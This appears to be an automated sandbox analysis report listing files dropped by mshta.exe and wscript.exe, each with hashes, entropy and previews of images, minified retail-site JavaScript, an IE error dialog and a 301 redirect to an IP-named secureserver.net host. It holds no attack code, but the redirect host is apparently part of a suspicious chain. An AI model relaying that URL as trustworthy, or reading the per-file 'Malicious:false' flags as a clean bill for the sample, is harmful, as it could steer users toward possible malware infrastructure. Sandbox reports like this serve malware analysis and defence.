                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.$Gu'.}.u.=.s..fFf$...I\6k!....@...k...{......Z....$..].ds....~6 .lc.I........IH3..T.LOOwWU..?"^...K3U3o>=U........;"..D..[...U....V.6.0...O.A..V.<.."`..m.....6....H.5..[7.....4....Y ..g..J.|...4.m;.iWM.b.x......d.........|..n;+..^l.......x..4.7..a..[.E....U.$.......4.-M.O..4m&.;Z...#....4.KZ....c...K.Fw/..7.{q..O.1".`#....8...X.DalM.F.f..t.....=..(..y._........4.3..a..B.g.b....u.}'x@...i7...)&.....c...=....t....`..{v..\u.Gr4t.;....>.Sx.7..<tL.=.i..>X.8y.`|.....N.H....2PV}S[......3f.._.~.i..jg....+@...q=`*..=.....)......%.\Z#..'z$..O..S..:.}..p...=....x.U.F..5Xs..h>...4.S......<....[..Y.s.sw.g..3_.....@...Am.8.....+x.Eo.3....0.S.,....)......].-W._...S....}.O..?.[.m.^......y..fL...gc...@..S.Q.h|....?..;>..g...x...P..G....>4.M}...'...3.....|../:..[..z..+_......}.~..`.+..-...W..On?..(.......QL~./0./.v......a./....?......H.`=pBK..F..~...d~.h..?.M..........~.....].hn=..oyu.?.,h.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (23795)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):23885
                                                                                                                                                                                                                                    Entropy (8bit):5.252757997314533
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:hHwxKC+QrwxKCpC13RQwxKC+O5b4NBOlgpEluE/7jAF+/fjfMSRNgFA2:S3RT6OlxB7UufjfMcgFA2
                                                                                                                                                                                                                                    MD5:C45F83F1265DAEF65E56C045188B74CA
                                                                                                                                                                                                                                    SHA1:9AFDF2480B43511C16FF1B9404C14050A9F8B338
                                                                                                                                                                                                                                    SHA-256:9BC48DD79AF31E65C5BB78352BD99651F2DA6E21365424E2EB9F8D72A741A0D8
                                                                                                                                                                                                                                    SHA-512:1C1E5A0A210B232196464008048464EED79C05DB607D9B7406B7340347F29867FD2ACD1483CA9188A289F9CAE21F9B66958E008CDBF04454A7ED9A96C1663340
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2941,9056,2256],{25051:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"PageFromCache"},variableDefinitions:[{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"path"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]},{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"area"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"page"},arguments:[{kind:"Argument",name:{kind:"Name",value:"path"},value:{kind:"Variable",name:{kind:"Name",value:"path"}}}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"components"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"template"},arguments:[],direct
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (27571)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):27667
                                                                                                                                                                                                                                    Entropy (8bit):5.435593973496815
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:viB2Yweb/sEDWk82DMVLXDTQHw92z+b/hNBpKA8I4udOJ5WuhyY0hSOKXq+Z2/:viBbEsWk9gU+VNBpzAuO3bOKXHZ2/
                                                                                                                                                                                                                                    MD5:483BF43C5686548F38E48328EE18DC16
                                                                                                                                                                                                                                    SHA1:8CE585783E2668B4A27FEDDA40FF7EDA78369510
                                                                                                                                                                                                                                    SHA-256:EACE43048A1F56C8E41E2640332350C5E4C47B848EA96CFB1FFD334719A48533
                                                                                                                                                                                                                                    SHA-512:287FA0855CDBAC628CDD4152B26AC6AD5321583D228E1CD1BD225E2899B4FE019CC25EECFF3760F8C693B77712D30452C2F1C08DDD02A56AF2E95C9D04AFF156
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4935],{25863:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var i,r,a=n(32735);function o(){return(o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const s=function(e){return a.createElement("svg",o({viewBox:"0 0 18 11","aria-labelledby":"setinha1Icon setinha1Desc"},e),i||(i=a.createElement("title",null,"icone de setinha")),r||(r=a.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},3126:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var i,r=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const o=function(e){return r.createElement("svg",a({fill:"
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3247
                                                                                                                                                                                                                                    Entropy (8bit):5.459946526910292
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                                                    MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                                                    SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                                                    SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                                                    SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1296 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):262851
                                                                                                                                                                                                                                    Entropy (8bit):7.996424490052967
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:0PAKyLKGJ7b+cdyaXFIXvZRYFy7qd4czOXdy2wB:kXy+OFVXFe+FjdsXd9U
                                                                                                                                                                                                                                    MD5:A367BF1879B82AED03ECFB1698095843
                                                                                                                                                                                                                                    SHA1:255FE9100F9524BBFA9B4796CBB6AA1A48D03775
                                                                                                                                                                                                                                    SHA-256:C637035554FC2485C53C7428D254C78E8AEA0854E0062C7EDD8218F47EB887A3
                                                                                                                                                                                                                                    SHA-512:E6BD635C3FDA03AEF5E2B74629F7A92E98BBF24F3E4CDC821E52F52A9C5DF3C12D177A45237F2385CBD6F717A1DC03DD1B2FFBD495B711BC4AFB562C83EE8818
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......D....._..v....pHYs............... .IDATx..I.$[r..7;.q...M5>v.#....PS.6..hX.Z......z'}..k'}.-.h.E.F. ...").."..d.c..W./.;D......1...o.73....~.;.{....._.~!p!......s....$ .2.e.@.0...E...bu"ph....F....+.+}Ph7...C ..L.a0W.o$.....H.P. ?F ....3..:a...I.4.....1....@.@..7.bm&.m..n..I..2..i........T......',T......>.(...8. ..WY.`4.f..Y=....5.j.]].*.;......K......H...$..3.........u~..].z.dh9k...C..G9..,u~..*......e;T.-S-..:..}$#..........-0.y........o*^O.l.x..a{.k....6rhNd.|X.m..%yx.....+.B....F....S..|....?,...;.$....M..<.q..f\n.....z:.....vms..9T..~5o.gS.....3k~2.J..c..........o.r~..y.o....>..e.gy......r..v..u.$<..rm..5..H.o).B....C..a=_.\ y....k..^{.{.t0...A.3..=r...V..Z....x.........(.u.`.3....7...].V7P@ .A.....Y.......D.U. Y@g.0..!.+b?.#(.>Q.J.H..>Kf.tM....FBX..<.= .b.w.<...xA..g....N..{..{....d/..8..!.. a.~.A......A...<H...*..A....zP....lc2.W....AB...v..b..7.?*..m..R....![|....cF.....kY/!..P.........S.7..o\.a.......Y=...
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):75266
                                                                                                                                                                                                                                    Entropy (8bit):5.4868613657936125
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:VA0tMXhVoJtZWRhdbv61H4qqlki5dd2LmOi:VA+eoUz6dJqVdd2Kj
                                                                                                                                                                                                                                    MD5:FB2EA915A0B1BE0FD030CEC3A3D5D09E
                                                                                                                                                                                                                                    SHA1:29A242DB4F907E4C731307B70E5D0E0E4E3DC52F
                                                                                                                                                                                                                                    SHA-256:F3B09C7BEE9D2ED30DF3CA4D497F9E8253E7338DB0CD8C06B954A1027B86B64C
                                                                                                                                                                                                                                    SHA-512:74F323BB85577B92EE4108B80BA864B5E6BD422CD096CB5E7E6AE9D315C5606E3F39281C676E85C2D39EF9E7BC9BCFBEDF7604CBB657AE1CF0248B57633CBFE5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ca,ea,ja,xa,za,Ea,Ga,
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):357
                                                                                                                                                                                                                                    Entropy (8bit):5.209832565354849
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
                                                                                                                                                                                                                                    MD5:8D156A3026840157CA292D51F52152BC
                                                                                                                                                                                                                                    SHA1:6314B3E015735F52A605CA45608CD14F95FEF6A0
                                                                                                                                                                                                                                    SHA-256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
                                                                                                                                                                                                                                    SHA-512:A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1062
                                                                                                                                                                                                                                    Entropy (8bit):4.517838839626174
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                                                    MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                                                    SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                                                    SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                                                    SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):9930
                                                                                                                                                                                                                                    Entropy (8bit):7.954853301155207
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:RSn+geYVEWjFbk4yc0eL1PJ7MvOWiHaMmRlOixz97tXdibW9x9:4nfeYrBL1PJRWiHjKlOixB7tYbq9
                                                                                                                                                                                                                                    MD5:62CF989CFD81560CB2E86C7465C6B8C9
                                                                                                                                                                                                                                    SHA1:241330EE4EF4939815FA3673AC61746AC7B74FE2
                                                                                                                                                                                                                                    SHA-256:DB9E5060D4F39A3615820B2368032F89652E79930B8E73D178E890BD42A655B6
                                                                                                                                                                                                                                    SHA-512:C2357BBAF553AED3C1B9CD6CFFEF41A1E95B03583B888ACAF557C7F02F3014C9412B69ECAE137B982246BCCE5FDFD9BC3FD529B6B698BABD46A0DAE110771371
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............).....pHYs............... .IDATx..olSW....!..$........v.b.<.."p..y......a.'..C.....v.zf.......I_....HM.E..t...BLU4.. Ft...1....8..6!.......}.}..k.>.jc.{....=......@..A..A..A..A..A..A..A..A..A...+u.r....!.b...5........D....X...8...,. ...C..\6.N.?..- .............0...Q...r.~Y..'......A.&*.0.....r.}...r,.......R.. ....0......E...x.........&.0_)._T.....^...../...98..!:A..o.W....H0.....<Z.3..I.....A.~.-..i=.Op9..q.N.. .........Z.......B+....y...qs.....8x.dp#..4.8f.P....Z....yO..R./..CF..0.....X.......pH..a.F...9.<Z......8..... ./.e..++A.&..O.......w..B2'.B3\@.g.By...%.3..h.. .....xK>N5y....o$r.(".hd..q.tkO....r.....0........!...L..0.....j.@W......QZ....k..Oh...Q&0...0....h.... ..Z.e.Er%..SoN.e.c...^]S.N.9A.-.z..=:...Q.8. xr%.)t...R.. ....\.....\....D...0.Op....*....L#..1...%.*t.......a.\<.0#.....;...A....G..{F.G!d.. .rDpg.&..,. ...1...2G.dm'....2jVU..9.. ....GB..T.........a.1..].a;AX...7.}.A.PML.Dy....U...h~N...g
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 192x296, components 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):67933
                                                                                                                                                                                                                                    Entropy (8bit):7.981811338191277
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:Ao0YGqhWx4tU6zEnTIhmIqf5wqVCVLa4FMwZPU5lS8MgiLj:jdhWStU6PJq3wWY65lFMgi/
                                                                                                                                                                                                                                    MD5:19BD857867CB28413BA3C1FE2BE7C4F5
                                                                                                                                                                                                                                    SHA1:477D5DF252F25A4A6DD9957A515BC819166D1C9E
                                                                                                                                                                                                                                    SHA-256:C43451F8977BA4EE07AC864EFC44B4324B643797C8693F068AFA580AEB572290
                                                                                                                                                                                                                                    SHA-512:F9E3CF7AF647509275445163BBE7D410C0B4D868A88C4C4C1F1B919CB39F1CCD096A75072B729BD1AB4359653DDBE3F416386CCDE4E6098041A0557E8DA51D58
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................(..........C....................................................................C.......................................................................(................................................V.............................!.."1..AQ..#2aq...BRX.......$'5G.%3bu.....(4CSt...&UV.....................................]..........................!1.."AQ.aq....2...#....'BRU....Sbr....$%35F.&4Ct..7VW.DET....................?..#.._.....=G.0.(..<...................1..L.....C.........`at00...]......C.........`at00...]......C......H.._.......r.c.G..a6=.h.,a.$1g?]M.."..lYk..#..t.#J.!.W(..DB:.a............@az{....../..>.(..h.i....G.......,..m...bF,.............=c..O.{'..........y.n.p.~DT.....e..`.._.?...:...o......?.......r...#..._..e..`.._.?...:...o........f.?.u....U...a~2E..9.......~c....&.._
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):289529
                                                                                                                                                                                                                                    Entropy (8bit):7.9932652654098675
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:KW+2YoKwvVf5652mJUrKbSGoXtSLkqbc4ijrmo:t+5Gto5R22bSGIlr9
                                                                                                                                                                                                                                    MD5:87BDE4CC492DCCB0F7D07560224F43D0
                                                                                                                                                                                                                                    SHA1:0F1B2372C7F2D6D1E6F952108805007E7CE894D4
                                                                                                                                                                                                                                    SHA-256:D8E3F0F1EB9B5E5CF6AF84B9794BB1603ED4EA10F89F3A85CCEAA07581AFF5F5
                                                                                                                                                                                                                                    SHA-512:B77F1065FD81DBCD1DE91CD67C4294599F7A4F2FD52F7F26AAF71659B597B5010E87B9E6F3016E6D4FF9321CC6B6A665405706D72651F333850EF6C5DB967EB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx.....y........0.m.P$...h..mY....s.C..p.p./.....C.....VX.M.h#.J.II... D.$@...`.^k.<......=..,.'....*+;..}_."K.@.....F...it....$..Z...=....W~..o>':.....:.V....&..........|..Q...>.......q......s.m.............p|..A..'z.'.[.{....h.....L0D....=.q....9.R...4nCy......g.=|.A.......k...N;....-..z.......vg:..N...u>...^......s..n.n..=..).I...$.n.E...<tz....T.D..v)..9tO2v.n...]...`.F~...'.7L.....p..B......8.=....^...d,L.7|..p.L0....e]...B.:...|.>...F]...|a..}.......i.nu.v.8L.....t."....t[^?.?h..#m.F.'..q.....f}?.p.....M.M"u........O......Z .Z..Ph.v.aR......Et\jL0....#.zd...1.e..&.....o..4...:..u.(...\3.=.~..n..n..}.....z.n......^.k?....g.>..bmO....,...F..^.v'EmEs..%?;...$6.....0...$....7....|?Z..'.`7......&8j....T...Gy.y.ip78...hx.......Ok..R....G%...v?..g4....R.u_~wW..|...$.n...~.6(#.|mooO.I..C.K?..A...^..d3.%.............}av..~.0....|X...t.Fx.......]..&....Ft..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):275314
                                                                                                                                                                                                                                    Entropy (8bit):7.994983258699055
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:k9ccbU3487K+ZcBqm8Q5HuURofVmp13XSksw8Q+jZ:ASD2se5H/DdXSZQGZ
                                                                                                                                                                                                                                    MD5:35AD7F987464144885786524DE1D9129
                                                                                                                                                                                                                                    SHA1:19CF119199C7B84F48761CCB5F1E9E1402D8A2F3
                                                                                                                                                                                                                                    SHA-256:19E919A123ABA9C62FD7785C3C234918412CE6C43836F36A355D648C9D3BF56C
                                                                                                                                                                                                                                    SHA-512:2D4DEE3EBD2218E2AD1D154F88924750980EFACD16908D7E40EEE630FA0154C5D64A401C1D6A5D316F780A3FC1EB9A3D03B794B1F8F000BEE1D719BA45C165D4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..W..H....w.!S}.TwuW.....l.9c.\..y.....o..4.F#.\...iU....'R...~x.@.22t D..o.W..pq\....=~.....`.CX..i..&..h...|..1.WfX:.,.|z9..E.-s..g2..r.UmZ....S..q.=....]....g.zsv.=..O...a.y.../..}.l...|Q..._...*e~.....F..m9.>....#.>.....~..o.v.Ci...%......]%..z......y./j.}>....)..l.....d....c...\......V/..E}1.....~.t.?..e.[..,.'.|..\\v<u.......p.....$.<.b.r...n.i..*.H.y...,(ay.q.t...i...........a..../...W.;b{8...G...b...}...u.............L...qH..Y...^...oV[...Fc9.B.......E..2.g..i.,.*{....}.!.......tL.i..1......U.*..}..V.....>..D.....n........!|a.cC.j.M...........n.3.#.8.q..W.......P.?e.....5.6...Ou...^....6....k........L_OO#.>.o.X.{x....jW.j_.?g..&.k....n.tu......IQ'q.....l.!......1,.J.I..is..}.r..q...#.......x...8.v=...!..............[.n./.u.[&[.HQVG.oK....".1...8......\.3...c...L.Y.mY&y..|5..U...._..U.i...n.x./zh-re^.....v.q...zw.f....O.Oy.y..G..n.....q|./.]..V.......6<6....N
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):73030
                                                                                                                                                                                                                                    Entropy (8bit):6.11057987816918
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:4c/e9ctt1/dZuSyQAvLlNC6uyEQcocibqccchcScs/t+BOtsQaR4:/GK71VZuSLWlU3PULm5sV+otT
                                                                                                                                                                                                                                    MD5:196D643C13C70CCDAD9F353EF1BE3BC0
                                                                                                                                                                                                                                    SHA1:D5AA2862E189B1DE64CBA5FBF1956F2D987C7FF0
                                                                                                                                                                                                                                    SHA-256:379B13D576D1B5991FE14E5C4D05C917D34282B038E0BBCE7A9A2C48AE90CF35
                                                                                                                                                                                                                                    SHA-512:965B996315AD5B335A97060FB2B36F3C151563572241F7AB5132480CC3517D42B68A894335195D01BC73CAAB96023B1C9D2E5214A75296C7B77E7B5C3C4A7AF3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[9442],{26311:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var o,i=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const r=function(e){return i.createElement("svg",a({viewBox:"0 0 18 11","aria-labelledby":"arrowIcon arrowDesc"},e),o||(o=i.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},78364:(e,t,n)=>{"use strict";n.d(t,{Z:()=>c});var o,i,a=n(32735);function r(){return(r=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e}).apply(this,arguments)}const c=function(e){return a.createElement("svg",r({viewBox:"0 0 25 25","aria-labelledby":"handtalkIcon handtalkDesc"},
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (374)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                                                    Entropy (8bit):5.626643783338183
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:+px/hRFVGywjr8Tuq8hvhFcaFyvz+ULEr2HK:cnRF4ywPBq8hDc0yvzPoyq
                                                                                                                                                                                                                                    MD5:8F5653EE7C8EE74F0D4DF359343936D1
                                                                                                                                                                                                                                    SHA1:897F35A7BAB39B76FBC7519960DF0A72D94C7E43
                                                                                                                                                                                                                                    SHA-256:6A4C45C194639AD7CA5F4F283619E0841298BBA4D976B072DBAA7DB6388F3637
                                                                                                                                                                                                                                    SHA-512:B65A16AD929C88E73F6DEB12FFE52398BF0F65DBAD01465F1E6E5CBB2DB023397E09BF8D12EC5DEFA2294B8F09CB8EC0514F2D6CEAD06572C7C65E5824C50949
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[6265],{50859:(o,t,n)=>{n.r(t),n.d(t,{default:()=>e});const e=(0,n(56875).vJ)(["body{color:#666;background:#f1f1f1;font-family:",";-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;}a{text-decoration:none;color:#666;}"],(function(o){return o.theme.fontFamily}))}}]);.//# sourceMappingURL=catalogo-ui-americanas-desktop-global-style.eee763bba4c682851831.js.map
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2261)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2353
                                                                                                                                                                                                                                    Entropy (8bit):5.448764768129052
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:ciq0LYM5tgKIXBb6//dYuQR/UbDZIweqbDQrEkIeKpY7vhjRIovV8UWfmFp966Ry:XEMBBA/eIw01hjH8BmFp9Yka75xe+fjr
                                                                                                                                                                                                                                    MD5:0BC0C33CF0F691D7D609885C8EBC555A
                                                                                                                                                                                                                                    SHA1:58F53A88A4847BB490F9F8E973469725A783C3EB
                                                                                                                                                                                                                                    SHA-256:D61D32EA479952154FE6C772E076C792BB61FF26E7B7E4EA7C73D1D7BD727DD5
                                                                                                                                                                                                                                    SHA-512:B56AB9AF223803C870A6290263FF32ED8A54B8602FE98D7ED58072C6C1B3DEB3B69F1A2D7B00020884DA6864DC3ABF6751780F9E4725D45C6041A93851BE0914
                                                                                                                                                                                                                                    Malicious:false
